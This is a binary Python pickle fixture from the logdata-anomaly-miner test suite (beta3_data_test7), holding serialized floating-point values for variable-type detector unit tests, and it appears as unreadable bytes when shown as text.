LG?M6G?t>Z5G?ש9R^G?CnӯG?1G?3YܱG?Ğ}*BLG?zYčG?#E G?t2~G?ћ%ߚ$G?vG?ʮG?܈G?5vG?X|(G?½7jG?քuG?>ctZG?|U\G?G?LG?7ʭ G?uG?w/\G?pg<_G?ܳ3 KG? 8GG?АdajAG?Z_6G?׮· nG?!6:G?")ukG?Չ9G? >G?1٤kG?ϳM|0:G?C07G?[G?- G?՜Q9pG?UG?Iǣ*G?X G?az-G?iYPG?mZx G?ꦑG?ɀZV3G?߯pOLG?ϝ.G?EG?WqG?y.G?AqRG?$[nmG?aڷ-G?׃\mG?ƃ 0G?FxTbG?ƾ,G?nG?6#ͫG?r2qG?nSnX| G?R7wOG?M-G?G]*#G?h'}G?HeG?tzG? cu9G?a7lG?*]G?Z#G?͆G?ŦF|G?zG?>bG?M'1G?،JG?ʐ`W^c G?~Y3UG?_mG?-G?lk??G? :9@ "G?fPOG?[S-G?ѰX?tG?fCG?ϣ^eG?ޱ&G?.G?ijG?:C~G?_G?g~G?X6A~G?eBG?ū/+T G?7w_G?ӆtG?#PG?Z(.G?Ԭ3KG?@b?G?B*G?^䧿SG?).G?;׭fG?zkOG?FxG?lG?Y;G?ͽCQcG?#8G?*IG? )gG?bG?ԵvG?ЃepHG?ڝnA\bG?0wdyG?38wG?.oG? 
G?:G?}:G?QlgBG?yY|G?RG?b_;G?)G?vF8 G?ۥnG?֌4rG?6BUG?%! G?QZ|FG?qMZqG?gBG?r EG?q;fG?T'G?ˤ]G?Ƕ"G?*JqG?eNuBG?#HC_G?UQG?LtHG?EG?(F%1jG?щ:QG?+n"TG?EݻG?c,$G?ȀoG?(;PԼG?Ÿ*G?9$נG?!ɴG?Ѣ5:G?2Z89G?tS2G?} G?~UDG?,xfG?=*LG?#G?,?drTVG?Կi>G?y/G?ه4G?{G?qJG?C4&G?vbG?cPGTG?^v/G?X\G?᪷DG?$G?%ЪG?}R;G?|7)SG?ځu:G?7:6G?7zU G?sϩVG?œK@G?͎j,G?c:{G?sxG?چ>N-G?qG?ӛvG?)^&?G?ߘmKEG?RϵYG?ӯ$ۍG??cG?IB'2G?`(TG?ױ$^G? {4kG?wi,G?AG?`7l;aG?¯±G?vBqeG?؝zECG?e67G?Ħ *G?G?]0sAG?X8G?ZP'YdG?G?# UG?LG?҈zG?ѾkG?_1uG?Q&G?8\lG?/KRG?vn3G?HyG?bJ1G?xBG?fG?5yG?Ӷ 籇G?ʚrG?pq/G?\cG?+Ǩ6QG?ݑoҽG?ặb[G?ZG?ɪNկG?vUƄG?=jG?bWF%G?бGG?1QnHG?sG?A'G?ʶ cG?Ql$G?%kjG?HwG? L3G?(G?G,G?X+G?_1G?>G?TA{}G?ԑ6:P#G?Ҏ i1G?ڼ[X.G?)[G?$K}MtG?zMhG?w'_G?4'rRG?rKյG?ߝG?^c-G?+G?ŋ G?z.%G?݇Q{G? Ot?G?<W|ȣG?}sG?EIjG?JƭG?-9tG?ad/[G?y,G? +xG?h"xMG?V" TG?Ɖ?G?AtG?òG?܎^G?+G?YzZu!G?M G?6'_xG?8 ](G?uG?·n\G?NoG?U=AUG?G?IQG?h5LRG?UPG?Yrf G?f_y5DhG?N,}F G?:k&G?Q[G?XUG?~zqFCG?ՑG?yN\G?DSG?_Q;G?^ G?߽\G?OG?[ے":MG?y޴G?Ņ AŹG?W֬G?N$G?dzG?#D G?埒G?LQu#G?ג(B3;G?PNMG?{0G?e'qG?֊)ُDxG?Yj+'\G?G?!L`mG?pwG?ID7G?揱G?]5jOG?VtkG?їdG?1.lYSG?> G?r iG?O qG?%~@G?jG[G?G?BW)^G?Z0]G?FI:G??`5G?OHG?պ#G?$&}G?c3G?slDG?wkG?s}UOyG?ΚatCG?YuׄlG?ن.n-QG?aLqG?钚G?~X>mG?6c5G?oG?sFnOG?֝G?܀}G?odG?HHG?1-G?TG?VԕwG?R5G?VXsG?7ApG?֛WDG?ǧҨG?(5CG?֝%G?f]ъG?~p3)G?@t#.XG?(gWG?ߞPfG?4G?*~}~G?1g?fG?AZcG?G?aG?Q#G?ʝ/ G?ʦ wfG?(XλG?QG?+DG?@$pG?i9G? "1G?ZG?#ƄG?5:jnG?0,G?cHG?-+f6G?^aG?G?!%xG?ıket;G?ر]G?6h)G?XґG?<>G?48G?O=3G?Y?1G?6'oG?6F;EG?pG?qjuG?f7.vKG?هG?UѿG?{ϟG?{UsTG?òl?G?ʋǪG?XG?ōJG?%5G?ל.JoG?~: G?iVzG?kI~G?~K2hG?1s G?1qNG?Ԥ) G?ֹYa G?PeG?O}G?Žfؼ#G?Z~G?,}͎G?͓T9jqG?jBq&G?%` BG?B5rG?נŐ-ƦG?5Z G?aąG?S^G?˺G?G?A]G?}cqG?qG?y$rӋG?޸0,G?_MSYG?kVG? 굜G?rEG?t[gG?<܆G?ԁuG?L:G?;&G?0,MuG?ssG?\A hG?+G?1NljfG?:G?G?֪ڏG?իBG?5WmaG?ncG?cL2}G?bmG?ܨ0 G?k_܅G?r#.G?O&i@bG?bЎG?rw]G?H LG?pNG?©e2gG?{G?ۮ G?A VG? "֟G?=gG?кWᘩG?kD8}G?ʲjG?h۴G?ΡU+XG?'21G?͜߈G?_bG?lV$G?[yw.G?c uRG?+ڸG?5`OG?P%xsG?%G?\v#G?e7G?mG?*$G?OZu]G?@Z[G?R|Q`G?Gs>G?i?KSPG?+;rG?I5G?rt0G?ܕPLG?Zi!G?GrýG?ƚ+:G?x% G?M~2QG?SCG?B/J7:G?XwZG?69)G?s0&G?!G?\RlIG? 
G?g8/iG?ƽRg2G?LG?h:TVG?׈iG?VTG?#G?qcIrG?΁uE 2G?$8jBG?G?eG?~RUEG?G?@u{&G?`G?ԏ'RuG?RL G?ӀmQG? G?fM@G?oG?ۗN͂G?UG?؛XG?Neb_G?\G?ĮaG?ػ pG?sWeG?Ɂd'G?WG?#G?Q2JG?ڥ\FNG? S0TG?otG?9*RTG?-#G?SGʁ,G?>eG?βΒ?G?z CG?ȏ G?M3_G?NKG?Fd%e](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta3_data_test7000066400000000000000000000647021437606560100275340ustar00rootroot00000000000000i](](G?G?L=G?4 !LG?Q+$6$G?- G?ߣ: G?ǿoG?rG?Ӈ`eZG?$*G?_g\G?ՒMG?h3G?kUc\5kG?j!+G?f@;ˢ8G?@agG?ۆN?%G?ԴG?ɲQG? UG?v-G?h]G?uN G?#G?W WqG? G?Ƚ%wS%G?N#G?" b G?׍VYG?IYaG??KxG?4Ī G?Y{G?OgG?ȉRv_G?EG?HT"G?ogzG?3kK`G?uˢG?أpG? KG?àoG?֤haCG?Ϯ{G?9x8G?ᚕ>|pG?qQG?EK<ϋG?5^G?tuFgG?K ]5G?G? x(c<G?i.RG?neG? dIG?u5J'3G?VdkG?QlxG?>=,aG?4]lG?NG?(ϯg=G?q=G?}x뵗G?j/sG?+G?/:}G?SъG?ߒҞYG?נ/ڀn^G?'ɰG?ʊQTY+G?G?@G?F^-G?ω4G?% fG?7AG?5 }8AG?sVSG?5 ZG? ;G?- q}G?ȭ:9G?ѡ4\G?ǨJG?X]sG?J(G?bCG?G?=ʗ#G?g䒸G?֢vdG? Gw(G?׌xG?CsZG?aVG?֖RG?C3G? -pG?٥rPG?K(fG?)z~G?#j G??)rG?-IG?ɳ) G?mnÿG?d(J&G?Q?G?<'G?y<;G?ךG?H\ G?O G?Ȳ ʨnG?RTG?ҕ+E2G?ٶH`bG?EQG?*IG? WG?2ؽG?G?˺X G?˙FG?XcN[G?k(G?ܡ|9ĄG?ܫ42G?ӘK,G? fG?ӐnaG? ²G?ەݛ\G?T G?<ΊLG?ԤrbG?aT*G?îLG?eY G?!%G?кŬG?YG?[L}7G?S]G?l*kG?9oG?4RG?/6G?*G?jIBG?ڠ٠1G?z6WOG?Ҋ%^G?rG?!OWG?>nG?-GjG?Փ6RG?QYwXG?ApG?jG?N٧G?_zG?m}(4G?=CAG?RGG?ب(G?;|nG?·'[G?|{G?* G?q4cG?G?i8ٽG?Ϲ.G?7G?]28G?ԑmZkG?[s(G?sпG?(:4G?z8`*W9G?SZ G?AVG?Py%kG?ѧG?v;G?X)DG?ŸskG?uсG?[G?8!A cG?l JlG?̎ǽ&G?ۿTp?jG?\[SǦG?Չ@G?G?(+PG?YG?%.pG?+G?ȵ G?G?~{MG?lj8.a$G? xG?M-G?'{G?֝GG?ӗ#1G?܍)mG?Ĝ1G?^-%[G?͑G?УoG?ӖUG?lL]G?ס"G?H_ G? JV*G?&7\+G?jeBKG?}ARG?Ƈ>2G?ZG?G?!}G?bX9ZrG?l>G?G?mÿCUG?ZA6G?wG?ŖG?A&G?>בG?ؾĎAG?wG?㋦p>G?neZG?QnG?U K~G?~}(G?⊴XG?ζՖG?טpG?9G?:;SG?jo%G?8VG?E i[G?=geG??CG?zG?29G?~G?Y' IQG?9(G?kjnМG?%tG?U=G?ЏʷmG?PSG?==aG?^G?G?/hG?`BG?UqS2G?eG?3zqq-G? SG?RWG?տA$WG?,qG?-B(G?jٹ6G?X \nG?HsvjG?жP!G?޹(G?5TgdG?UxG?ՈePi5G?gUG?!G?ثM.G?b̔G?־G?NPE7G?v70iG? 2`G?Q1ַG?׭(tG?ֵ:G?骤(lG?љR}bG?G?(OG?щS5#G?PKG?'G?9CMG?GG?=;G?EnG?ȋf*G?yӍ*G?<>dG?䡗qJG?\G? ZkG?e9G?ɍ8߄G?ŀM~G?<䵈UHG?\G? jѸ6G?iG?'4v~G?15G? 6±nG?+ĽG?FG?/ G?iws7G?ܴf+G?PAOG?AmOG? 
Sl1TG?#:$G?ޢfNFG?އ~1ȊG?طWiG?TAG?QlzG?y{XG?UQ,NG?ΑcG?01v5G?dExG?4 `G?ŀ:G?mE*eG?*G?&G?7KG?(G?۶G?>DG?"NG?ɝAQZG?F636G?/G?FgG?·L*G?a\G?]fG?DG?=YP;G?pG?ے3❶G?& G?<;G?G_~G? BG?R`|G?d~0&G?'Q&G?P'G?^G?`kv>G?ɝ@ƕG? G? G?0|v'G?AHG?QIG?ܓڻ'/G?`,L'G?N.;G? i)}G?(G?;@G?z:G?Կ/5G?& 8G?ÔvG?Ֆt$G?Φ^nG?$G?otG?U"G?Y@G?π,$G?ĭ1 hG?@$94G?$BG?@QG?rG?4{"/G?2G?ؚTG?sQG?:yaG?" c#G?ã}n&OG?XG?M6-G?@ruG? xG?#M/G?xJsG?t4G?بG?e~G?9G? u^G?/xG?uӰ׎G?{7pגG?ziG?̦ePtG?,,ѿG?*rĆG?%LCG?fUG?;@G?!$ĠG?wVG?prG??teG?#'G?KxRG?$TG?uG?-&G?͈(G?o|]'G?EPǎG?#yFWG?%&M G?sBG?:CG?itՍG?R_ nG?MG?Ӯ]{AcUG?֋moG?TG?"+G?w`z*G?|rjG?װ;a"G?1G?˝0ũUG?9 zuG?G.fG?5^G?ON7#G?7PG?_}G?M& G?:G?juG?=HG?tR+G?ęXG?gkG?{)G?-cG?|3GSG?A/Z0VG?,{">G?ޜXG?o1G?tG?jNG?UpTG?T3ҰG?ppG?j:N\G?IYWG?ڒ塥fyG?۞xpIG?̐ݴqG?G?u G?JUG?uoG?(MQG?r؄AG??G?Ɣ[ G?J%® G?Y0_G?a7YG?§G?ޠ%G?HjG?s2,hfG?AG?ſ`G?3 QG?S`7G? IbG?5sHG?PxG?GG?oӇG?|]G?IgzƋzG?iG?JLG?9}#HG?ڥ439G?ڡG?4VSG?E|G?~5U#A3G?spG?͑ rG?|G(G?Ԉ,G?ۙ1iG?W NG?HzG?9G?ɶd wG?'DG?# G?bzjG?(5UG?ɃM2G?+~.RG?BH UG?oG?h'JG?*y~PgG?G?,ztG?PG?sxB?lG?EԪ̶NG?٠˫VG?Ե2G?A5{G?q\NG?{#InG?aN5$b*G?Z \G?tG?S*+G?!3G? a4G?ZJ6G?EZɗG? >G?!G?[G?$o e(G?BM)G?à=_G?сvpG?I5G?hK:;G?Ն!=:G?۶.G?ћG?YDG?"VG?iG?ЙxvpG? aDjG?U(V&G?]~G?½'9G?%[aG?צ紟G?ۜG?,G?_0jG?؟6'&G?Ue-HG?̀iyG?Խo}G?ރKG?٩1粹G?ڑPkG? _G?-详FG?d"G?g;vpG?ӧFoG?>SG?ؓ\AG?=(nG?߃XG?_G? xG?V(cG?ĴDVRG?93rXG?U:G?ŵ G?4vG?4h((G?ˏ|G?޿BحG?أ> ߞ^G?xHG?-xKXG?#xG?6G?R G?hnŴG?qŬ;G?G?\9@G?\!PG?4G?ן]LG?E6Z.hG?glݡG?}VG?#G?,ßbG?X'=]G?/G?G?G,nG?~IG?@sG?=G?lAG?j:01G?\BG?Ԅ?WG?3jCG?=4kG?GdzKG?>VvG?|CnG?eG?ϛXG?\vG?ݝMhNG?\p+-G?^G?LrG?#6BEG?-d;G?{IG??AG?n]G?.G?S@VG?и~G?# G?ݎ~7G?>EG?..6G?gS G?`Vv,G?ΦD#G?G?AqG?[tG?֖G?AGlG?,"p@G?+;G?,XJZG?ɱ_DG?ƪ#"ܽG?uG?0G?MdKG?ږgcG?4EMG?YdG?t7EG?HhG?;HŁBG?bzG?kG?G?*;9G?GQ6G?q', /G?ƽOG?G?!?G?!B2G?$#9G?0ݑaG?ˮ%VG?+ G?3X,DG?/IՍ G?FdyG?g^{G?l\lG?՗ӉR&G?,OjSG?Ҫ[M,G?ofmG?R/yR G?'6G?tüG? .>IG?G?5y?G?4R G?ƭe G?߫G?ٶ%aG?SOJG?UMiG?>d"~G?긏MG?mC^G?ue#vG?ÉʣMgG?iרG?ۯMG?5>G?G ?G?V~G?},y;.G?_>G?DcG?G?zfCG?JmG?̻ŜnG? ; U G?ȇeG?Ʌ G?,a/ҟG?ȼ3G?XG?ibRG?KgXG?5WM3G?I FuG?hiG?՝ G?J+XG?) 
Bn6G?)a(G?JxG?1U >G?[wG?KS7G?ɡtnyG?ՕIşG?F|OG?oZ/KG?ۭ-;4G?JG?|G?AԊG?yi#G?jW^xG?G?ƂwG?.ܛG?~G?(q#G?xG?z(G?Ѓ&0p!G?ӴqG?#nG?vYG?҈}^G?1yAG?XG?*G?hG?U=Y`G?;0G?CnC"G?2G?A`bG?M3R/G?W֨G?.PG?qLG?a;<G?&WG?_+G?S NG?вOG?~@ЖG? 3G?apG?Ņ ՞G?ֲCG?PeTG?o+G?Qm2G?̮`G?vvVEG?\VG?߼3G?ӂuCG?zG?ζfG?Hw.?G?XzJ7G? mWPG?џG?jp74G?ںwhG?Ӿ[ UG?vgG?ĩS G?4G?m/ G? %_G?w]-BG?k! ?YG?4 G?~G? 9*G?ׅG?̳zJٞG?Y:G?kGG?xoI G?%4{G?֙HG?`kG?G?hӄvG?Q5aG?Y^&G?^G?{lG?4<$G?WG??_KD$G?/̔G?G?~G?[G?UG?׆G?BMG?G?ѭNG?8jG?SC{ҳG?,e@ G?foG?ԖG?)=OJG?Vy< G? #G? wG?՝PkG?G?r&GG?'G?n"(G?ç ~gG?>ɮG?k1,%PG?.G?ū!#?G?(vUG?d#G?t)1G? }8G?"AӲG?cbG?㰆PG?G?ś\G?9CcG?SeG?¥qG?}H'1G?x7G??f4G?!zG?-랓G?O/G?;}ZKG?/JLG?θJG?_k;G?b5G?S~Z,G?ؤuG?-8X %G?aq ;G?l-/ G?g2<G?æ+*G?׈orG?ξB{G?Z[G?ƽDyG?˧G?9vG?~ wPG?GIvG?ؼ2HG?\3FHG?kG?ZN#G?5G? jwG?(uG?02tG?˨G?Zm4G?6=G? JHG? ."0G? 9=qG? #G? 5lhG?-Qg*G?)9AG?Yv(G?w=G?͸qJ4G?>B6DG?y G?ŷG?#UZG?ο[ G?&ǺG?7/G?^h 0G?֑P;G? ǵAG? TG?bPF9G?ѭz1lG?‚ɱ,G?-wlG?${`G?ߔ@>G?CG? 7FG? G?kCG?? G?=G?7GwfG?;j;WG?C{G?="i+.G?{EG?N7\yG?=WG?+TG?E/f~G?G?HKQ0G?St^0G?B_ LG?ٰG?ѴߓIG?&=r!G?޹G?ȕ!LjG?{rcG?_GMG?ĹV̵|G?žJG?W*JG?7r\4nG?_x[G?%G?ԉ-gG?'`8 G?CL72G?m G?ާMWG?Fg G?Ɖe]G?B,G?WG?ڦ݂G?vG?8!vG?g>G?G4G?[jܷ4G?KG? ,G?ʬޱIG?ڸ)jG?pЪLG? FlG?1UcG?ݿyG?$*G?5UeG?ͰG?¾ aG?$i?G?/ nG?ݕy(G?oґG?MG?B_;G?G6[G?^ G?VTT!rG?wƩJG?֓+dG? G?]@G?JfãG?LJ[EG?MߕG? o4G?d`RG?@1G?B^𤕹G?ءG?7t8G?L 'G?ViG?ѷTkpG?kd`G?` G?{tG?rPG?ͩQG?'G?גٿ,bG?Ў碥G?ނ4G?ЀfƙPG?+6G?e|G?G?ŋف+G?ZG?І37G?}c?G?z)G?v[k":G?tBG?¸#]G?hS5G?@6]G?FkoG?quG?ӕ&,G?zg>G? G?]9;G?ŏZG?eG?_x8CG?<|ޑZG?xyslG?ߚtG?ҫhTJG?G?P+&G?mG?2dE5G?gY76G?MkAAGG?G?2SG?cEëG?rG? NG?ϑ2G?YJVG?Ԟ2z/G?ꟸG?Z)G?qG?ؠG?7;zG?ݩ lG?]2G?ӻ~G?ҐZ6G?vG?=w}G?!G?MRG?Ԋ8G?T4G?돟[G?l%FG?'BG?]|G?\_`G?>06G?'$KG?^I~}G?l~[%G?ZSEJMG?G?a &G?Њ/ypG?ՏAQG?]G?Տ99G?Ӽ:SvG?J̍G?OG?3G?ٟԭG?1-OOG?سG?HG?@G?h ԞG?,,r-+G?sYMQG?eyG?"W5G? aG?ڦKJ4G?,wG?6I.G?ⴼ]G?NC)qG?ШG?̩6G?U3vG?ߝ. G?㓍ՑG??^ XG?BqbG?wB-G?M4G?0x_G?DVu5)G?ǽXG?":G?`\ G?{ąG?Wf"G?(&s G?Րs^ G?܊ G?dkG?gFo-G?AdJG?[,EG? | l\G?۴G?~@cZG?ʪ8݈G?ag]G?Baj G?(G?D>_G?W~0hG?nz~G?ӴfG?۱'G?M\KG?F-쇢G?TV6G?6<G?HwG?k8G? |G?ǚ1}6gG? ]{G?^ S:G?,gG?\aDG?{7DG?=3G? 
gG?XpjscG?rIߏG?!nXmG?WOPG?ALɾG?HjٕG?*q 5G?0`=G?ErG?zR6`G?b]G?H&;&G?F. G?BjG?'ӵG?E#ѪG?<Z~G?N/u|&G?,2dG?o-dG?ӑ*:G?VaOG?||G?߳6 G?eG?=.vG?ȱͻG?˒F?2G?G? /eG?҅!xcG?-##G?ͱJG?Ѥ&M G?i5 :G?FG?pEG?e`+MG?xB@G?.H%G?gR7G?ߞG?`=G?ҍ`U3G?΂A4G?ԩ D)G?N!1IG?!)G?qOG?H G?ўwj0G?ˍttG?RyIG?qw.qG?z)=G?vgG?Ā5G? gG?^ʌؔG?ǝ)WG?H%  G?W"G?*$ڝBG?)M!G?zdG?'N;&G?{K&>G?fߥ߼G?Ǫ紐G?PG?g%cG?NPwG?}zFG?ʴ-G?9G?~h!>G?;)G?ΧJ G?ܕ)/2G?ٴzG?c0mG? OXG?ms?BJG?7RG?0t:G?փgG?8֢G?#CfG?APGG?-ٳ/G?3>FxG?Ȉ"`_G?4G?c}G?T2G?+;G?2GG?˲kKG?G?!1P PG?>u[G?5ܹG?)KG?J /ˀG?Լ);G?FHG?Փ5#sG?녷G?ƫ`G?y 8G?/G?ҏLG?[}G?_L_CQG?1G?v+7G?iFzyG?[˭n>nG?~[[NG?竨 G?Q],G?RXG?Ђ72G?r+ G?C%G?*$G?f 6G?o!G?tG?o (G?:OG?aG?C)'G?֏XY՞G?ǩcȥG?jA?G?o#GfG?m4P)G?schEG?ߘG?}AiG?S#G?Ɏ.}CLG?bG?6eG?IG?NG?iazG?TG?hJ G?ZwFrG?JG?yACJG?' ;NG?/G?mνG?ajyG?AEOG?6(h2G?ѫgG?KVQG?;|G?TsG?HG? G?^.aG?IܯgqG?xG?)sG?+9G?9{G?δ|G?Se](G?kJG?Ͼ|PG?Ԑ~G?# >`YG?|+G?Ӄ "G?Ɛj~G?knG?:G?b#xG?6^G?ǩG?>U jG?$1YG?LWG?RܼG?̃ Y5G?!RG?"tnG?֩R]G?=2$pG?ԑiG?U>CG?ـ 0G? JaG?nG?6uG?:}G?? %3G?\EG?֕ԀAPG?G?N^AG?(G?.G?EBEG?Q oG?nrG?f=iG?(G?ũ  G?*VG?D{"G?5rPG?O+hG?+m+G?(@G?փ'rݸG??4[G?bY9G?СPs^˚G? G?7MG?MGV\G?e kG?;')G?A#VG?٘EJG?bG?Ϋ{G?vG?SؑrG?Ό[ G?(K2aLG?ØID8G?3bFR7?G?ؙܸG?kʙJG?ɝD7|G?rzG?4ȥG?X6}G?ڨ0DG?pȍ8G?ǘ2;gG?p.G?ŦY G?xW3-G?wrG?3!*gG?G?/uG?ǫ񌃸G?ԋ.O0G?jgG?oSNMG?]"7G?ԥ^G?׎uG?ˤ@9G?ߡG?FTG?AFG?0&G?Dˈ{G?a1G?7 DG?}s^G?! C}G?!8G?pG?߱Je*G?JVgG?6;G?6 }TG?G?zYzG?ΊײG?qJWG?3s+_kzG?oOPG?c>G?MUG?L@`G?š =G? HKG?\ÂnzG?X>.SwG?܄;`G?G?t}G?׍S@&oG??u! G?‚KKG?n3OG?DAG?Qb8G?xQ G?ִLG?e$vsG?^ZxG?|ktG?d[~9JG?ڝd)G?҅#`PG?KG?㲄 {OG?iG??4yG?K &G?SpGSG?r_YG?ىVG?#G?fBaG?0T^iG?|g!G?6@G?8UcG?6G?r G?5lG?TZ~G? PwG?.aiTJG?q>ctG?rhG?X E%G?G?݂\4G?Cm?G?B&] G?^G?sNaG?0xG?ՔwG?{4{G?.+V$G?:$G?ڵZG?ӿ ^G?J =G?,f:G?ԙG?@G?ʹ ~G?gh-G?֥AUG?d=ּG?}k G?mG?{Oj}G?j޺G?vEXG?wG?O3G?r`qG?LG?'zvG?c-sF?G?.^XG?ὼt G?ƯIG?okQG?x:VG?G?85G?ׅG?PܰG?<{qG?̲$G?=wpfG?ÃTi`G?ßG?̝HG?>Wpȍ6G?FeG?\7 G?M؛G?~nWG?lZ{YG?VDG?zIG?Z)G?ġŒG? w G?KGlG?LsalG?rK]G?:$G?(yG?J)XG?婈PG?@G?`DxG?XbS84G?ӔCG?ӳG?.TuG?BG?(夬G?G?İ:`-"G? &0]!G?J}G?уxMG?LhT:G?;y4)G?TG?" 
kerG?AG?գB`G?nIG?p>G?Ȁ]G?ˤٲG?ϢT=IJG?;jwG?{G?2mG?͸G?ٿ#ЏG?ի՞G?p89G?v0;WG?&y G?T̾G?KG?߇b%kG?BM}G?iQFG?@ܴ=FG?q{G?Zv G?]/2~G?RKIBEG?,z=G?@`TG?J G?lG?G?҇;KYG? F[G?Iݒ>+G?9xG?ǙPx=G?ߗKG?ՂBG?;G?1%Hu7G?V6 $G?ΪKGG?*|G?;GG?۟`G?W#G?AG?O8G?Ʀ4G? # G?QG?vKٞhG?>G? S(G?ְ[G?qG?DdlG?ƪ[)dG?reG?>v[G?d_G?P:G?N:~bG?3sG?BXCfG?f'G?XG?CVn G?Lf:G?Ĭ9G?ݙ8BPG?䤼83G?gG?m@G?­iC1!G?ؿG?< VCG?، U[G?g> 'G?#G?KV_G?c-|G?q ;G?=-EG?¤D2_$G?yFG?HG?^*G?WG?\`V tG?g'G?ӇLΈG?3G?(G?G?Im:hG?>SG?% ^OG?W&zwPG?hXu~gG?Ӥ$7[G?ӿRJNwG?G?"lfG? i"kG?k+M|G?HG?ߙqzG?V; =RrG?)<'G?!*+\$G?ˤD G?Ҵ]G?qnG?xǜG?7 7G?}_%G?| WG?^ c5G?وG?ɓ\E0vG?e3 G?i~ZG?^DG?Cu{>3G?$ΈG?R֊X)G?^egG?P G?@|G?[G?o.G?rՊzG??RJ0G? oPG?em䋝G?H G?¿-i/G?/ .G?nJXG?Ի0G?dsG?RTюG?g53UkG?[ȥG?!e_3G? a0G?φ`FG?G?<%-G?Zvt\G?faRG?1ݚ䠃G?8G?:G?>k"G?7a 7YTG?nG?˽?1G?f4G? G?kׁoG?ҕʶG?`8G?tձG?kG?ȫ;xG?ʤЧG?MJ~@G?+xG?z<eG?ЏJ G?Q1=G?JXG?'w G?ї1rc G?qcU G?Ps0:G?1cCG?#IG?Bs9G?etG?A'}QG?ٿHG?SJG?=FG?O%EG? YG?Ԁ]5G??cG?£ G?mNlG?"ʊ'G?h4G?YY/G?؇0G?e#G?:|7G?Em[G?pG?Ͼ}G?**6G?ʨ>G?Q!}iG?nCyG?G?G?G?'GkG?sPols_G?M 5G??ZG?  G?DžG?7G?-G?;oքG?VDG?G?ʀG?hg2G?^L2nG? #G?KèG?>c|G?̟4G?t"wG?>מG?xV81G?Y7LFG?ɵG?U[G?%>@G?҄G?<>tG?QG?Օ{I@G?G?:-G?G``G?ϿDfG?#wiz G?ô k\G?z3&G?^pOBG?M5$ZG?AG?=Hx|+G?}G?A!G?{!ǠG?ر-+G?hvqG?rr.G?ƞ #bG?̇u1G?-o"`G?d\G?7/G?WpG??mJG?완G?V4>G?3W2sG?٦>VG?Q2wG?g-_lG?ٲWtѪQG?0/G?Ȼ ;G? 6UkG?L(wG?hJG?b٤G?ʛBG?5C0G?Dm4G?uב'G?HsgG?L螝zG?BdtG?hNΡfG?T =ՃG?x2'G?5QG?K2VG?f'2WG?unG?FgG?Τ~X;rG?|H(G?o2w\$G?…鲅G?n2kG?Ũ4G?;7ígG?ag݆G?=v;G?7֍G?1G? ܆8G?<91?G?wJG?-G{G?sV G?BPV}G?/)G?0xG?~'ŋG?LPdG?ƽ3f2G?,ʼnJZGG?ׂd@OwG?uG?8'rӗG?o#qG?[9,G?c[x,fG?G}G?'Z:G?V$n=_G?LG?tUvJG?OǥJ'G?suUG?lXQ@G?d{G?0C S//G?G?G?pG? ]G>ϨEfG?( G?ĉgMG?s"G?ݭ#G?H1ZG?s7G?_LqG?E3mG?A_G?; pwG?xG?\KfG?ՠƈ G?TC\G?ЭRghG?`[G?c,G?濷^G?IG?g4V'G?i?6ϝG?a26G?ԑIG?5PN*G?)mG?z ^G?[gG?1ڳhG?]\G?.G?7,EG?b֒G?RM:lG?֩bNG?moG?ŇG?`SG?fG?̻n-G?5; 5G?7G?xdHG?fHbG?E) G?z`LLOG?(WG?̈DG?ܝWCyG? "}iG?`XG?G?K)VG?Z)G?-%uG?JlG?4FVG?A2kG?ҷG?tG?M- &0G?. wG?‰03{G? K|?G?mG? ${&G?~3+}G?MYTG?j}( ^G? 
(6pG?1|\G?ч祖fG?kG?f.G??G?ŽӦG?[G?Փ*G?hQ_ZG?m4G?rG?:[G?ٗYt#G?ьE4;G?oG?PFG?NG?W6mxG?`+8(G?FG?NG?7 ;G?cG?˲' G?"\eG?G?6U0G?VNdvG?o?G? ,%G?RiG?##"mG?xG?ɛ>G?HG?X5G?FhSYG??FWG?tG?kyG?M+G?%>JG?,G?l-%G?vFG?зʰiG?^FG?-Z|G?kR}G?*aHG?|EG? G? WG?Qp8bG?H/cG?"G?_ZG?< 'G?Ь*G?ϧvG?ƺvG?dqrG?J}p6G?̣G? O;G?j.G? tXG? jXG?lcG?oG?هG??ҜG?UI1G?FObfG?Шј׍G?R7xG?նv'G?zG?G?׵/G?/G?8) _G?P+MG?«7]{@G?osG?)wZG?[\G?̮_G.G?/SG?אVVG?G? \@G?PiG?ȖdG?zQG?%QG?n'LG?ʔo/5G?$`G?G?Ï]G? [RG?XbIG?r(G?~MpUG?Ɉi*G? чG?2G?PG?C)G?SwiG?p.ˉG?Kzn G?0XdG?D˻/G?(ˋ%\KG?a\U*G? nG?J!LG?/sG?:ôDG?hEDG?^HG?1-=G?+}SG?ǥcG?JaG?kg}G?3\mG?%`G?bIG?вPEM+G?Sy G?ayEG?xuHG?<׶G?ՅTywAG?|Þ PG?hʤdG?2^&G?ҝR+G?vG?Ybre?wG?~N5G??(G?6MwG?FG?bG?UG?Ճ TG?X#bG?7_ȶG?Sb_IG?GM>ZG?Pi G?X߻G?o G?Ç8-G?+vG?rG?_G? )G?E]„G?5UsG?fﻅTG?G]D͍G?P?mG?@\yG?Ɵ_SOG?н`{G?MsG?ͽu3G?uX?G?G?a-G? G?Li"G?W G?̊{f=G?^:G?l⾨O$G?X1lG?aeG?¼ISҺG?]{=G?Tc돦 G?%lG?G?ʮeB.G?ƌ9%G?Ķ$v;G?l>v.$G?_G?z B'G?r$,G?.YG?yQ2gSe(G?LwG?NG?G?xX~G?؉!cbG?ю,TG?,dG?ݢG?Nh G?BxG?WJWG?r G?6G?i{kzG?oh}!7G?w띧p G?O!FG?+V_G?ƂG?չG?*ֳG?= G?UJr_$G?lAG?qJNG?(qG?7|-G?ã$CPG?yճJG?ʙG?m*[W;G?H"-dG?I ۅG?g+~4XG?:G?rG?{wOG?B8bG?qrG?5mG?a=۫G?'IG?jG?L G?8stNG?YB[G?: G?pCDWG?ѐR07G?!ᥦJG?[T<#G?h{G?okZG?ft:G?Tr?DG?zxLG?cG?~SG?{(G?sAhG!G?Us-G?VDjN-G?(H3KG?0~!SG?E>G?,'dG?KgG?ÜG?pi>QG?gdG?n=G?nG?G?}GG?uXG?PzwG?Iz.G?lBG?ޱeDG?r4iG?'G?2G?JG?Gi7v G?65G?ͦiG?俥"G?\tyJG?md7G?A LԶG?w˓=0G?K2T'G?Px&/G?SG?a(SG?PƉG?%G?j}ҿ:G?'϶G?=^G?~f 2yG?٩G?B*G?mo\G?]G?laG?DxG?6?nCG?6dG?tG?eXG?X (G?,+T^G?9G?ȎJtG?OmG?֗W_AiG?َ0gG?uLG?fVؕG?P*6G?l}G?˯~KG? 